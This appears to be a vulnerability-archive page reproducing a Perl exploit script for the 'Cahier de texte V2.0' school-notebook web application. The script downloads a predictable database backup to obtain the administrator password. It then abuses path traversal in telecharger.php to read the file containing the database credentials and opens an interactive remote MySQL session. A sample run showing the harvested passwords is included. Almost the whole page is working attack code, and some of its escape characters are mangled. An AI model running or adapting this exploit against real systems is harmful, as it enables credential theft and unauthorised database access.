Cahier de texte V2.0 SQL Code Execution Exploit

2006.12.06
Credit: DarkFig
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

#!/usr/bin/perl # # # INFORMATIONS # ============ # Affected.scr..: Cahier de texte V2.0 # Poc.ID........: 15061124 # Type..........: Predictable backup filename, Source disclosure # Risk.level....: High # Conditions....: register_globals = on # Src.download..: www.etab.ac-caen.fr/bsauveur/cahier_de_texte/ # Poc.link......: acid-root.new.fr/poc/15061124.txt # Credits.......: DarkFig # Note..........: Coded for fun # # # SCREENSHOT # ========== # header> Cahier de texte V2.0 SQL Code Execution Exploit # header> ----------------------------------------------- # status> Searching the backup file # sploit> Administrateur::epolas # status> Downloading database informations # sploit> Host::sql.mysite.com # sploit> Database::cahier_de_texte # sploit> Username::root # sploit> Password::toor # status> Contacting the mysql server # _mysql> select * from cdt_prof # +-------+--------------+---------+ # |ID_prof|nom_prof |passe | # +-------+--------------+---------+ # | 1|Administrateur|epolas | # | 2|DarkFig |crazypass| # +-------+--------------+---------+ # 4 rows processed # # mysql> exit # use MySQL; use Getopt::Long; use LWP::UserAgent; use HTTP::Response; use HTTP::Request::Common; print STDOUT "nheader> Cahier de texte V2.0 SQL Code Execution Exploit"; print STDOUT "nheader> ", "-" x 47, "n"; $opt = GetOptions( 'host=s' => $host, 'path=s' => $path, 'proxh=s' => $proxh, 'proxu=s' => $proxu, 'proxp=s' => $proxp); if(!$host) { print STDOUT "header> Usage: ./xXx.pl --host=[www] --path=[/] [Opts]n"; print STDOUT "header> [Opts] --proxh=[ip] --proxu=[user] --proxp=[pwd]n"; exit(1); } $host = $host !~ /^http:/// ? "http://$host" : $host; $path = defined($path) ? $path : "/"; $ua = LWP::UserAgent->new(); $ua->agent('0xzilla'); $ua->timeout(30); $ua->proxy(['http'] => $proxh) if $proxh; $re->proxy_authorization_basic($proxu, $proxp) if $proxp; # First vulnerability # =================== # The backup's filename is allways the same # If the file is protected by a .htaccess file, # use the source disclosure vulnerability to get it. # There is also all members passwords but here we # just take the administrator password. print STDOUT "status> Searching the backup filen"; $re = GET $host.$path.'administration/dump.sql'; $res = $ua->request($re); if($res->as_string !~ /HTTP/1.(x|1) 404 Not Found/) { if($res->content =~ /INSERT INTO cdt_prof VALUES(1, 'Administrateur', '(.*?)');/) { print STDOUT "sploit> Administrateur::$1n";}} else { print STDOUT "sploit> None backup foundn";} # Second vulnerability # ==================== # Source disclosure in administration/telecharger.php print STDOUT "status> Downloading database informationsn"; $ch = '../Connections/conn_cahier_de_texte.php&Fichier_a_telecharger='; $re = GET $host.$path."administration/telecharger.php?chemin=$ch"; $res = ($ua->request($re))->content; if($res =~ /$hostname_conn_cahier_de_texte([s]*)=([s]*)"(.*?)";([s]*)(|| )$database_conn_cahier_de_texte([s]*)=([s]*)"(.*?)";([s]*)(|| )$username_conn_cahier_de_texte([s]*)=([s]*)"(.*?)";([s]*)(|| )$password_conn_cahier_de_texte([s]*)=([s]*)"(.*?)";([s]*)/) { $mhost=$3; $database=$8; $username=$13; $password=$18; print STDOUT "sploit> Host::$mhostnsploit> Database::$databasen"; print STDOUT "sploit> Username::$usernamensploit> Password::$passwordn";} else { print STDOUT "sploit> Exploit failedn"; exit(1);} if($mhost =~ /^(localhost|127.0.0.1)$/ or !$mhost) { print STDOUT "sploit> MySQL server is localhostn"; exit(1);} # Third step # ========== # Trying a connection with the MySQL server print STDOUT "status> Contacting the mysql servern"; $dbh = Mysql->connect($mhost, $database, $username, $password); $dbh->selectdb($database); while() { print STDOUT "_mysql> "; chomp($query = <STDIN>); $query =~ /^(exit||quit)$/ ? exit(0) : 0x2727; $res = $dbh->query($query) ? $dbh->query($query) : $dbh->errmsg(); $res != $dbh->errmsg() ? print $res->as_string : 0x2727; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top